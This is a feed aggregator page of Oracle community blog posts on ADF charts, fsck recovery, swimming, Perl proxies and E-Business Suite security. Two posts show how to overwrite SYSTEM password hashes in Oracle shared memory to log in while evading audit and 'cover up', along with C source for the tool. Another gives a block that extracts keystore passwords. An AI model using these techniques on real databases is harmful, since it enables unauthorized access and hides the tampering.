Skip navigation.

Feed aggregator

Downloading VirtualBox VM “Oracle Enterprise Manager 12cR4″

Marco Gralike - Sat, 2014-07-12 11:10
Strangely enough those cool VirtualBox VM machine downloads are nowadays a bit scattered on different Oracle places on http://otn.oracle.com and others. So in all that...

Read More

ADF 12c (12.1.3) Line Chart Overview Feature

Andrejus Baranovski - Sat, 2014-07-12 10:51
ADF 12c (12.1.3) is shipped with completely rewritten DVT components, there are no graphs anymore - they are called charts now. But there are much more, besides only a name change. Previous DVT components are still running fine, but JDeveloper wizards are not supporting them anymore. You should check ADF 12c (12.1.3) developer guide for more details, in this post I will focus on line chart overview feature. You should keep in mind, new DVT chart components do not work well with Google Chrome v.35 browser (supposed to be fixed in Google Chrome v.36) - check JDeveloper 12c (12.1.3) release notes.

Sample application - ADF12DvtApp.zip, is based on Employees data and displays line chart for the employee salary, based on his job. Two additional lines are displayed for maximum and minimum job salaries:


Line chart is configured with zooming and overview support. User can change overview window and zoom into specific area:


This helps a lot to analyse charts with large number of data points on X axis. User can zoom into peaks and analyse data range:


One important hint about new DVT charts - components should stretch automatically. Keep in mind -parent component (surrounding DVT chart) should be stretchable. As you can see, I have set type = 'stretch' for panel box, surrounding line chart:


Previous DVT graphs had special binding elements in Page Definition, new DVT charts are using regular table bindings - nothing extra:


Line chart in the sample application is configured with zooming and scrolling (there are different modes available - live, on demand with delay):


Overview feature is quite simple to enable - it is enough to add DVT overview tag to the line chart, and it works:

R12.2 :Modulus Check Validations for Bank Accounts

OracleApps Epicenter - Sat, 2014-07-12 08:45
The existing bank account number validations for domestic banks only check the length of the bank account number. These validations are performed during the entry and update of bank accounts.With R12.2 the account number validations for United Kingdom are enhanced to include a modulus check alongside the length checks. Modulus checking is the process of [...]
Categories: APPS Blogs

ORA-09925: Unable to create audit trail file

Oracle in Action - Sat, 2014-07-12 03:33

RSS content

I received this error message when I started my virtual machine and tried to logon to my database as sysdba to startup the instance.
[oracle@node1 ~]$ sqlplus / as sysdba

ERROR:
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925

- I rebooted my machine and got following messages which pointed to some errors encountered during filesystem check and instructed to run fsck manually.

[root@node1 ~]# init 6

Checking filesystems

/: UNEXPECTED INCONSISTENCY; RUN fsck MANUALLY.
(i.e., without -a or -p options)
*** An error occurred during the filesystem check.
*** Dropping you to a shell; the system will reboot
*** when you leave the shell.
Give root password for maintenance
(or type Control-D to continue):

– I entered password for root to initiate filesystem check. As a result I was prompted multiple no. of times to allow fixing of  various filesystem errors.

(Repair filesystem) 1 # fsck
Fix(y)?

- After all the errors had been fixed, filesystem check was restarted

Restarting e2fsck from the beginning...

/: ***** FILE SYSTEM WAS MODIFIED *****
/: ***** REBOOT LINUX *****

- After filesystem had been finally checked to be correct, I exited for reboot to continue.

(Repair filesystem) 2 # exit

– After the reboot, I could successfully connect to my database as sysdba .

[oracle@node1 ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.1.0 Production on Sat Jul 12 09:21:52 2014

Copyright (c) 1982, 2009, Oracle. All rights reserved.

Connected to an idle instance.

SQL>

I hope this post was useful.

Your comments and suggestions are always welcome.

—————————————————————————————–

Related Links:

Home

Database Index

 

————-

 



Tags:  

Del.icio.us
Digg

Comments:  0 (Zero), Be the first to leave a reply!You might be interested in this:  
Copyright © ORACLE IN ACTION [ORA-09925: Unable to create audit trail file], All Right Reserved. 2014.

The post ORA-09925: Unable to create audit trail file appeared first on ORACLE IN ACTION.

Categories: DBA Blogs

Swimming Progress

Tim Hall - Sat, 2014-07-12 02:59

While I was at BGOUG I went for swim each morning before the conference. That got me to thinking, perhaps I should start swimming again…

It’s been 4 weeks since I got back from the conference and I’ve been swimming very morning. It was a bit of a struggle at first. I think it took me 2-3 days to work up to a mile (1600M – about 9M short of a real mile). Since then I’ve been doing a mile each day and it’s going pretty well.

I’m pretty much an upper body swimmer it the moment. I kick my legs just enough to keep them from sinking, but don’t really generate any forward thrust with them. At this point I’m concentrating on my upper body form. When I think about it, my form is pretty good. When I get distracted, like when I am having to pass people, it breaks down a little. I guess you could say I am in state of “concious competence“. Over the next few weeks this should set in a bit and I can start working on some other stuff. It’s pointless to care too  much about speed at this point because if my form breaks down I end up having a faster arm turnover, but use more effort and actually swim slower. The mantra is form, form, form!

Breathing is surprisingly good. I spent years as a left side breather (every 4th stroke). During my last bout of swimming (2003-2008) I forced myself to switch to bilateral breathing, but still felt the left side was more natural. Having had a 6 year break, I’ve come back and both sides feel about the same. If anything, I would say my right side technique is slightly better than my left. Occasionally I will throw in a length of left-only or right-only (every 4th stroke) breathing for the hell of it, but at the moment every 3rd stroke is about the best option for me. As I get fitter I will start playing with things like every 5th stroke and lengths of no breathing just to add a bit of variety.

Turns are generally going pretty well. Most of the time I’m fine. About 1 in 20 I judge the distance wrong and end up having a really flimsy push off. I’m sure my judgement will improve over time.

At this point I’m taking about 33 minutes to complete a mile. The world record for 1500M short course (25M pool) is 14:10. My first goal is to get my 1600M time down to double the 1500M world record. Taking 5 minutes off my time seems like quite a big challenge, but I’m sure as I bring my legs into play and my technique improves my speed will increase significantly.

As I get more into the swing of things I will probably incorporate a bit of interval training, like a sprint length, followed by 2-3 at a more sedate pace. That should improve my fitness quite a lot and hopefully improve my speed.

For a bit of fun I’ve added a couple of lengths of butterfly after I finish my main swim. I used to be quite good at butterfly, but at the moment I’m guessing the life guards think I’m having a fit. It would be nice to be able to bang out a few lengths of that and not feel like I was dying. :)

I don’t do breaststroke any more, as it’s not good for my hips. Doing backstroke in a pool with other people in the lane sucks, so I can’t be bothered with that. Maybe on days when the pool is quieter I will work on it a bit, but for now the main focus is crawl.

Cheers

Tim…

PS. I reserve the right to get bored, give up and eat cake instead at any time… :)

Swimming Progress was first posted on July 12, 2014 at 9:59 am.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.

Finished first pass through Alapati 12c OCP upgrade book

Bobby Durrett's DBA Blog - Fri, 2014-07-11 17:29

I just finished reading Sam Alapati’s 12c OCP upgrade book for the first time and I really like it because of the content that it covered which I hadn’t discovered through my study of the Oracle manuals.  Also, it did a good job explaining some things that Oracle’s manuals left unclear.

After reading each chapter I took the end of chapter test and got between 60% and 75% of the questions right.  Next I plan to take the computer based test that was on the CD that came with the book and which covers both parts of the upgrade exam.

I did find minor errors throughout the book, but I still found it very useful especially after having already studied the same topics on my own without a study guide like this one to direct me.  The author’s insights into the test and the material it covers adds value because they guide me to the areas that I need to focus on.

- Bobby

Categories: DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 17:12
The dates, and the speakers, for the Latin America Tour have been anounnced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

EMC XtremIO – The Full-Featured All-Flash Array. Interested In Oracle Performance? See The Whitepaper.

Kevin Closson - Fri, 2014-07-11 16:32

NOTE: There’s a link to the full article at the end of this post.

I recently submitted a manuscript to the EMC XtremIO Business Unit covering some compelling lab results from testing I concluded earlier this year. I hope you’ll find the paper interesting.

There is a link to the full paper at the bottom of this block post. I’ve pasted the executive summary here:

Executive Summary

Physical I/O patterns generated by Oracle Database workloads are well understood. The predictable nature of these I/O characteristics have historically enabled platform vendors to implement widely varying I/O acceleration technologies including prefetching, coalescing transfers, tiering, caching and even I/O elimination. However, the key presumption central to all of these acceleration technologies is that there is an identifiable active data set. While it is true that Oracle Database workloads generally settle on an active data set, the active data set for a workload is seldom static—it tends to move based on easily understood factors such as data aging or business workflow (e.g., “month-end processing”) and even the data source itself. Identifying the current active data set and keeping up with movement of the active data set is complex and time consuming due to variability in workloads, workload types, and number of workloads. Storage administrators constantly chase the performance hotspots caused by the active dataset.

All-Flash Arrays (AFAs) can completely eliminate the need to identify the active dataset because of the ability of flash to service any part of a larger data set equally. But not all AFAs are created equal.

Even though numerous AFAs have come to market, obtaining the best performance required by databases is challenging. The challenge isn’t just limited to performance. Modern storage arrays offer a wide variety of features such as deduplication, snapshots, clones, thin provisioning, and replication. These features are built on top of the underlying disk management engine, and are based on the same rules and limitations favoring sequential I/O. Simply substituting flash for hard drives won’t break these features, but neither will it enhance them.

EMC has developed a new class of enterprise data storage system, XtremIO flash array, which is based entirely on flash media. XtremIO’s approach was not simply to substitute flash in an existing storage controller design or software stack, but rather to engineer an entirely new array from the ground-up to unlock flash’s full performance potential and deliver array-based capabilities that are unprecidented in the context of current storage systems.

This paper will help the reader understand Oracle Database performance bottlenecks and how XtremIO AFAs can help address such bottlenecks with its unique capability to deal with constant variance in the IO profile and load levels. We demonstrate that it takes a highly flash-optimized architecture to ensure the best Oracle Database user experience. Please read more:  Link to full paper from emc.com.


Filed under: All Flash Array, Flash Storage for Databases, oracle, Oracle I/O Performance, Oracle performance, Oracle Performnce Monitoring, Oracle SAN Topics, Oracle Storage Related Problems

Best of OTN - Week of July 6th

OTN TechBlog - Fri, 2014-07-11 11:13

Virtual Technology Summit - Content is now OnDemand!

In this four track virtual event attendees had the opportunity to learn firsthand from Oracle ACEs, Java Champions, and Oracle product experts, as they shared their insight and expertise on Java, systems, database and middleware. A replay of the sessions is now available for your viewing.

Architect Community

In addition to interviews with tech experts and community leaders, the OTN ArchBeat YouTube Channel also features technical videos, most pulled from various OTN online technical events. The following are the three most popular of those tech videos for the past seven days.

Debugging and Logging for Oracle ADF Applications
We're only human. Regardless how much work Oracle ADF does for us, or how powerful the JDeveloper IDE is, the inescapable truth is that as developers we will still make mistakes and introduce bugs into our ADF applications. In this video Oracle ADF Product Manager Chris Muir explores the sophisticated debugging tooling JDeveloper provides.

Developer Preview: Oracle WebLogic 12.1.3
Oracle WebLogic 12.1.3 includes some exciting developer-centric enhancements. IN this video Steve Button focuses on some of the more interesting updates around Java EE 7 features and examines how they will affect your development process.

Best Practices in Oracle ADF Development
In this video Frank Nimphius presents a brown-bag of ideas, hints and best practices that will help you to build better ADF applications.

Friday Funny
"I always wanted to be somebody, but now I realize I should have been more specific." - Lily Tomlin

Java Community 

Codename One & Java Code Geeks are giving away free JavaOne Tickets (worth $3,300)! Read More!

@Java RT @JDeveloper: Running Oracle ADF application High availability (HA)

Tech Article: Leap Motion and JavaFX

Database Community

OTN DBA/DEV Watercooler Blog - Database Application Development VM--Get It Now

Oracle DB Dev FaceBook Posts -

Systems Community

New Tech Article - Playing with ZFS Shadow Migration

New - Hangout: Which Virtualization Should I Use for What? with Brian Bream


Oracle-PeopleSoft is pleased to announce the general availability of PeopleTools 8.54

PeopleSoft Technology Blog - Fri, 2014-07-11 10:51
PeopleTools is proud to announce the release of PeopleTools 8.54.  This is a landmark release for PeopleSoft, one that offers remarkable advances to our applications and our customers.  We are particularly excited about the new PeopleSoft Fluid User Experience.  With this, our applications will offer a UI that is simple and intuitive, yet highly productive and that can be used on different devices from laptops to tablets and smart phones. 
We’ve also made important improvements in reporting and analytics, life-cycle management, security, integration technology, platforms and infrastructure, and accessibility.

To get the details about everything this wonderful new release has to offer, visit these sites:                  + Release Notes                 + Release Value Proposition                 + Cumulative Feature Overview Tool                 + Installation Guides                 + Certification Table                 + Browser Compatibility Guide                 + Licensing Notes Today, PeopleTools 8.54 is Generally Available for new installations.  Customers that want to upgrade to 8.54 from earlier releases will be able to upgrade in the near future when the 02 patch is available.  
Many of our customers have shown interest in Fluid and have asked us the best way to get productive quickly.  Our answer is to use the working examples they will find in the upcoming PSFT 9.2 application images.

E-Business Suite Applications Technology Group (ATG) - WebCast

Chris Warticki - Fri, 2014-07-11 10:20

Thursday July 17, 2014 at 18:00 UK / 10:00 PST / 11:00 MST / 13:00 EST

EBS REPORTS & PRINTING TROUBLESHOOTING

  • Analyzer: E-Business Reports & Printing
  • E-Business Reports Analysis
  • Recommended Reports Patching
  • Reports Profile Options
  • E-Business Printing Analysis
  • Recommended Printing Patching
  • Printer Profile Options
  • Best Practices

Details & Registration : Note 1681612.1

If you have any question about the schedules or if you have a suggestion for an Advisor Webcast to be planned in future, please send an E-Mail to Ruediger Ziegler.

Oracle users may require remote database management

Chris Foot - Fri, 2014-07-11 10:01

A reputed professional recently discovered a bug in one of Oracle's key security implementations, which may prompt some of its customers to seek active database monitoring solutions. 

A good start, but needs work 
According to Dark Reading, David Litchfield, one of the world's most well-recognized database protection experts, recently discovered a couple of faults in Oracle's redaction feature for its 12c servers. The defensive measure allows database administrators to mask sensitive information from malicious figures.

Although Litchfield regarded the feature as a good deployment, he asserted that a highly skilled hacker would be capable of bypassing the function. He noted that employing a type of Web-based SQL injection is a feasible way for an unauthorized party to gain access to information. Litchfield is expected to demonstrate this technique among others at Black Hat USA in Las Vegas next month. 

"To be fair, it's a good step in the right direction," said Litchfield, as quoted by the source. "Even if a patch isn't available from Oracle, it's going to protect you in 80 percent of the cases. No one really know how to bypass it at this point."

Constant surveillance
Although Oracle is working to mitigate this problem, enterprises need to wonder what's going to protect them from the other 20 percent of instances. Having a staff of remote database support professionals actively monitor all server activity is arguably the most secure option available. 

Specifically, Oracle customers require assistance from those possessing the wherewithal to defend databases from SQL injection attacks. Network World outlined a few situations in which this invasive technique has caused harrowing experiences for retailers:

  • In the winter of 2007, malware was inserted into Heartland Payment Systems' transaction processing system, resulting in 130 million stolen card numbers. 
  • In early November 2007, Hannaford Brothers sustained a malicious software attack that led to the theft of 4.2 million card access codes.
  • Between January 2011 and March 2012, a series of SQL injection endeavors against Global Payment Systems incited $92.7 million in losses. 

Take the simple steps 
Network World acknowledged the importance of treating routine processes as critical features. For example, forgetting to close a database after testing the system for vulnerabilities is negligence that can't be afforded to transpire. 

In addition, it's imperative that enterprises understand the mapping of their database architectures. This protocol can be realized when organizations employ consistent surveillance of all activity, allowing professionals to see which channels are the most active and what kind of data is flowing through them. 

The post Oracle users may require remote database management appeared first on Remote DBA Experts.

A Ringleader Proxy for Sporadically-Used Web Applications

Pythian Group - Fri, 2014-07-11 08:46

As you might already know, I come up with my fair share of toy web applications.

Once created, I typically throw them on my server for a few weeks but, as the resources of good ol’ Gilgamesh are limited, they eventually have to be turned off to make room for the next wave of shiny new toys. Which is a darn shame, as some of them can be useful from time to time. Sure, running all webapps all the time would be murder for the machine, but there should be a way to only fire up the application when it’s needed.

Of course there’s already a way of doing just that. You might have heard of it: it’s called CGI. And while it’s perfectly possible to run PSGI applications under CGI, it’s also… not quite perfect. The principal problem is that since there is no persistence at all between requests (of course, with the help of mod_perl there could be persistence, but that would defeat the purpose), so it’s not exactly snappy. Although, to be fair, it’d probably be still fast enough for most small applications. But still, it feels clunky. Plus, I’m just plain afraid that if I revert to using CGI, Sawyer will burst out of the wall like a vengeful Kool-Aid Man and throttle the life out of me. He probably wouldn’t, but I prefer not to take any chances.

So I don’t want single executions and I don’t want perpetual running. What I’d really want is something in-between. I’d like the applications to be disabled by default, but if a request comes along, to be awaken and ran for as long as there is traffic. And only once the traffic has abated for a reasonable amount of time do I want the application to be turned off once more.

The good news is that it seems that Apache’s mod_fastcgi can fire dynamic applications upon first request. If that’s the case, then the waking-up part of the job comes for free, and the shutting down is merely a question of periodically monitoring the logs and killing processes when inactivity is detected.

The bad news is that I only heard that after I was already halfway done shaving that yak my own way. So instead of cruelly dropping the poor creature right there and then, abandoning it with a punk-like half-shave, I decided to go all the way and see how a Perl alternative would look.

It’s all about the proxy

My first instinct was to go with Dancer (natch). But a quick survey of the tools available revealed something even more finely tuned to the task at hand: HTTP::Proxy. That module does exactly what it says on the tin: it proxies http requests, and allows you to fiddle with the requests and responses as they fly back and forth.

Since I own my domain, all my applications run on their own sub-domain name. With that setting, it’s quite easy to have all my sub-domains point to the port running that proxy and have the waking-up-if-required and dispatch to the real application done as the request comes in.


use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time = 5;
my $shutdown_delay = 10;

my %services = (
    'foo.babyl.ca' => $foo_config,
    'bar.babyl.ca' => $bar_config,

);

$proxy->push_filter( request => 
    HTTP::Proxy::HeaderFilter::simple->new( sub {

            my( $self, $headers, $request ) = @_;

            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $service->is_running ) {
                $service->start;
                sleep 1;
            }

            # store the latest access time
            $service->store_access_time(time);
    }),
);

$proxy->start;

With this, we already have the core of our application, and only need a few more pieces, and details to iron out.

Enter Sandman

An important one is how to detect if an application is running, and when it goes inactive. For that I went for a simple mechanism. Using CHI to provides me with a persistent and central place to keep information for my application. As soon as an application comes up, I store the time of the current request in its cache, and each time a new request comes in, I update the cache with the new time. That way, the existence of the cache tells me if the application is running, and knowing if the application should go dormant is just a question of seeing if the last access time is old enough.


use CHI;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);

...;

# when checking if the host is running
unless ( $chi->get($host) ) {
    $service->start;
    sleep 1;
}

...;

# and storing the access time becomes
$chi->set( $host => time );

# to check periodically, we fork a sub-process 
# and we simply endlessly sleep, check, then sleep
# some more

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $s = shift;

    my $time = $chi->get($s);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$s}->stop;

    $chi->remove($s);
}

Minding the applications

The final remaining big piece of the puzzle is how to manage the launching and shutting down of the applications. We could do it in a variety of ways, beginning by using plain system calls. Instead, I decided to leverage the service manager Ubic. With the help of Ubic::Service::Plack, setting a PSGI application is as straightforward as one could wish for:


use Ubic::Service::Plack;

Ubic::Service::Plack->new({
    server => "FCGI",
    server_args => { listen => "/tmp/foo_app.sock",
                     nproc  => 5 },
    app      => "/home/web/apps/foo/bin/app.pl",
    port     => 4444,
});

Once the service is defined, it can be started/stopped from the CLI. And, which is more interesting for us, straight from Perl-land:


use Ubic;

my %services = (
    # sub-domain      # ubic service name
    'foo.babyl.ca' => 'webapp.foo',
    'bar.babyl.ca' => 'webapp.bar',
);

$_ = Ubic->service($_) for values %services;

# and then to start a service
$services{'foo.babyl.ca'}->start;

# or to stop it
$services{'foo.babyl.ca'}->stop;

# other goodies can be gleaned too, like the port...
$services{'foo.babyl.ca'}->port;

Now all together

And that’s all we need to get our ringleader going. Putting it all together, and tidying it up a little bit, we get:


use 5.20.0;

use experimental 'postderef';

use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

use Ubic;

use CHI;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time      = 5;
my $shutdown_delay = 10;

my $ubic_directory = '/Users/champoux/ubic';

my %services = (
    'foo.babyl.ca' => 'webapp.foo',
);

$_ = Ubic->service($_) for values %services;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);


$proxy->push_filter( request => HTTP::Proxy::HeaderFilter::simple->new(sub{
            my( $self, $headers, $request ) = @_;
            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $chi->get($host) ) {
                $service->start;
                sleep 1;
            }

            # always store the latest access time
            $chi->set( $host => time );
    }),
);

start_sandman();

$proxy->start;

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $service = shift;

    my $time = $chi->get($service);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$service}->stop;

    $chi->remove($service);
}

It’s not yet completed. The configuration should go in a YAML file, we should have some more safeguards in case the cache and the real state of the application aren’t in sync, and the script itself should be started by Unic too to make everything Circle-of-Life-perfect. Buuuuut as it is, I’d say it’s already a decent start.

Categories: DBA Blogs

Log Buffer #379, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-11 07:34

During this summer time in Northern hemisphere, and winter time in Southern hemisphere, the bloggers are solving key problems either by sitting besides the bonfire, or enjoying that bbq. This Log Buffer Edition shares both of these with them.


Oracle:

3 Key Problems To Solve If You Want A Big Data Management System

OpenWorld Update: Content Catalog NOW LIVE!

Interested in Showcasing your Solutions around Oracle Technologies at Oracle OpenWorld?

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

What You Need to Know about OBIEE 11.1.1.7

SQL Server:

Interoperability between Microsoft and SOA Suite 12c

This article describes a way to speed up various file operations performed by SQL Server.

The Mindset of the Enterprise DBA: Creating and Applying Standards to Our Work

Stairway to T-SQL: Beyond The Basics Level 8: Coding Shortcuts using += and -= Operators

Microsoft Azure Diagnostics Part 2: Basic Configuration of Azure Cloud Service Diagnostics

MySQL:

MySQL Enterprise Monitor 2.3.18 has been released

Harnessing the power of master/slave clusters to operate data-driven businesses on MySQL

NoSQL Now! Conference – coming to San Jose, CA this August!

Manually Switch Slaves to new Masters in mySQL 5.6 (XTRADB 5.6)

How to Configure ClusterControl to run on nginx

Categories: DBA Blogs

powershell goodies for Active Directory

Laurent Schneider - Fri, 2014-07-11 07:04

What are my groups?


PS> Get-ADPrincipalGroupMembership lsc |
      select -ExpandProperty "name"
Domain Users
oracle
sybase

Who is member of that group ?

PS> Get-ADGroupMember oracle| 
      select -ExpandProperty "name"
Laurent Schneider
Alfred E. Newmann
Scott Tiger

What is my phone number ?

PS> (get-aduser lsc -property MobilePhone).MobilePhone
+41 792134020

This works like a charm on your Windows 7 PC.
1) Download and install Remote Server Administration Tools
2) Activate the windows feature under control panel program called “Active Directory Module for Powershell”
3) PS> Import-Module ActiveDirectory
Read the procedure there : how to add active directory module in powershell in windows 7

Oracle E-Business Suite Security - Signed JAR Files - What Should You Do – Part II

In our blog post on 16-May, we provided guidance on Java JAR signing for the E-Business Suite. We are continuing our research on E-Business Suite Java JAR signing and will be presenting it in a forthcoming educational webinar. Until then we would like to share a few items of importance based on recent client conversations -

  • Apply latest patches - The latest patches for Oracle E-Business Suite JAR signing are noted in 1591073.1. There are separate patches for 11i, 12.0.x, 12.1.x and 12.2.x. To fully take advantage of the security features provided by signing JAR files the latest patches need to be applied.
  • Do not use the default Keystore passwords - Before you sign your JAR files change the keystore passwords.  The initial instructions in 1591073.1 note that a possible first step before you start the JAR signing process is to change the keystore passwords. Integrigy recommends that changing the keystore passwords should be mandatory. The default Oracle passwords should not be used. Follow the instructions in Appendix A of 1591073.1 to change both keystore passwords. Each password must be at least six (6) characters in length. If you have already signed your JAR files, after changing the keystore passwords you must create a new keystore and redo all the steps in 1591073.1 to create a new signed certificate (it is much easier to change the keystore passwords BEFORE you sign your JAR files).
  • The keystore passwords are available to anyone with the APPS password - Using the code below anyone with the APPS password can extract the keystore passwords. Ensure that this fact is allowed for in your polices for segregation of duties, keystore management and certificate security.

SQL> set serveroutput on
declare 
spass varchar2(30); 
kpass varchar2(30); 
begin 
ad_jar.get_jripasswords(spass, kpass); 
dbms_output.put_line(spass); 
dbms_output.put_line(kpass); 
end; 
/

This will output the passwords in the following order:

store password (spass) 
key password (kpass)

If you have questions, please contact us at info@integrigy.com

References Tags: Security Strategy and StandardsOracle E-Business Suite
Categories: APPS Blogs, Security Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, and the database did not crash, or detect the data change, and allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record, and no evidence in datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back-out the changes made to SGA to the original hash values to cover up completely.
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1ECThis program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.SEARCH FOR   :- 09F3A178C7F6F650REPLACE WITH :- E235D5FC5165F1ECEnter Y to continue :- Y/dev/shm/ora_orcl_20381697_76 replace string at 2099160replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2271972replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_76 replace string at 2320344replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_75 replace string at 994020replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_68 replace string at 2624228replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_37 replace string at 450614replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with C/dev/shm/ora_orcl_20381697_35 replace string at 695886replace 0 with Ereplace 9 with 2replace F with 3replace 3 with 5replace A with Dreplace 1 with 5replace 7 with Freplace 8 with Creplace C with 5replace 7 with 1replace F with 6replace 6 with 5replace F with Freplace 6 with 1replace 5 with Ereplace 0 with CError: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.   I have tested it on Linux against Oracle 12C databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include stdio.h
#include stdlib.h
#include ctype.h
#include dirent.h
#include string.h
#include unistd.h
#include sys/file.h
#include sys/mman.h

replace_sga(char search_string[],char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
